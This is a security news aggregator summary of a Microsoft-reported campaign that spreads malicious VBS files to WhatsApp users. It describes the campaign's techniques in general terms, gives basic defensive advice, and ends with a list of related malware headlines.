CP
cyberpings
Malware & RansomwareHIGH

WhatsApp Malware - New Campaign Uses VBS Files for Access

Featured image for WhatsApp Malware - New Campaign Uses VBS Files for Access
CSCSO Online
WhatsAppmalwareVBS filesMicrosoft Defenderremote access
🎯

Basically, hackers trick WhatsApp users into running harmful files that let them control their devices remotely.

Quick Summary

A new malware campaign is targeting WhatsApp users with malicious VBS files. This attack enables persistent access and remote control of infected devices. Microsoft warns users to be cautious and monitor their systems for suspicious activity.

What Happened

Microsoft has issued a warning about a new malware campaign targeting WhatsApp users. This campaign involves the distribution of malicious Visual Basic Script (VBS) files. Attackers have been using social engineering tactics to trick users into executing these files since at least late February. Once the scripts are launched, they initiate a multi-stage infection flow that blends into normal system activity, allowing attackers to pull additional payloads for remote control.

The campaign leverages a combination of living-off-the-land (LOTL) techniques and trusted Windows utilities. By using legitimate tools and platforms, attackers can evade detection and increase the chances of successful execution. This strategy makes it difficult for users and security solutions to identify malicious activity.

Who's Being Targeted

The primary targets of this campaign are WhatsApp users who may receive messages containing the malicious VBS files. These files are disguised as legitimate content, making it easy for unsuspecting users to execute them. Once executed, the scripts create hidden directories on the system, setting the stage for further compromise.

The attackers take advantage of the trust users have in WhatsApp, a widely used messaging platform. This trust, combined with the social engineering tactics employed, significantly increases the likelihood that users will fall victim to the attack.

Signs of Infection

Once the VBS files are executed, users may not immediately notice anything suspicious. The malware operates in the background, utilizing renamed versions of legitimate Windows utilities like curl.exe and bitsadmin.exe. These disguised binaries perform malicious tasks while blending into the environment, making detection challenging.

As the infection progresses, the attackers deploy Microsoft Installer (MSI) packages to maintain control over the infected devices. These packages are not typically flagged as suspicious, allowing the attackers to execute custom actions during installation. Users may only realize something is wrong if they notice unusual behavior or performance issues with their devices.

How to Protect Yourself

To safeguard against this malware campaign, users should be vigilant about the files they execute, especially those received through messaging platforms like WhatsApp. Here are some recommended actions:

  • Monitor script and installer execution: Keep an eye on any scripts or installers running on your device, especially those from untrusted sources.
  • Watch for misuse of legitimate tools: Be cautious of any unexpected behavior from trusted utilities on your system.
  • Track suspicious activity: Regularly check for unusual activity tied to files delivered through messaging platforms.

By staying informed and cautious, users can better protect themselves from this evolving threat.

🔒 Pro insight: The use of LOTL techniques in this campaign highlights the need for enhanced monitoring of legitimate tools and user behavior to detect anomalies.

Original article from

CSCSO Online
Read Full Article

Share

Related Pings

HIGHMalware & Ransomware

Linux Rootkit Detection - Importance of Behavioral Analysis

Rootkits in Linux systems are a growing threat, exposing the weaknesses of static detection methods. This article discusses how behavioral detection can enhance security. Discover techniques to better protect your systems against these stealthy attacks.

Elastic Security Labs·
HIGHMalware & Ransomware

Ransomware - New Cybercrime Service Promotes Data Monetization

A new cybercrime service is promoting the sale of data stolen from ransomware attacks. This could lead to more victims facing extortion. Experts are divided on its potential success.

SC Media·
HIGHMalware & Ransomware

CrystalRAT Malware - New Features Include Prankware and Theft

CrystalRAT malware is making waves with its remote access and data theft capabilities. Users of popular browsers and apps are at risk. Stay alert and avoid suspicious downloads to protect your data.

BleepingComputer·
HIGHMalware & Ransomware

Malware Campaign Uses WhatsApp to Deliver Malicious VBS Files

A new malware campaign is leveraging WhatsApp to deliver malicious VBS files via trusted cloud platforms. Organizations are at risk as attackers blend into normal operations, making detection challenging. Security experts recommend proactive measures to combat this evolving threat.

SC Media·
HIGHMalware & Ransomware

NoVoice Android Malware - Infected 2.3 Million Devices

A new Android malware named NoVoice has infected over 2.3 million devices via Google Play. This malware targets WhatsApp data, posing serious security risks. Users must take immediate action to secure their devices and data.

BleepingComputer·
HIGHMalware & Ransomware

CERT-UA Impersonation - Malware Campaign Targets 1 Million Emails

A new phishing campaign impersonating CERT-UA has spread AGEWHEEZE malware to over 1 million emails. This attack targeted various sectors, raising serious security alarms. Stay vigilant against such threats to protect your data.

The Hacker News·